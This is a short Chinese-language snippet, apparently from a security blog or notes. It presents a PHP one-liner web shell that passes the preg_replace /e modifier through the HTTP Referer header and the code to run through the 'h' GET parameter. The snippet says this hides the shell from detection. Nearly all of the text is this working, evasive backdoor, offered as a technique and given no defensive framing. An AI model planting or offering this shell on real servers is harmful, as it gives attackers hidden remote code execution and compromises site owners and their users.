preg_replace(//) 函数加/e可以执行代码 。 这里的 “e”我使用referer的方式来获取, 绕过了检测

<?php
$server= $_SERVER['HTTP_REFERER'];
$s[1]=$server;
preg_replace("/t/{$s[1]}",$_GET["h"],"t");

img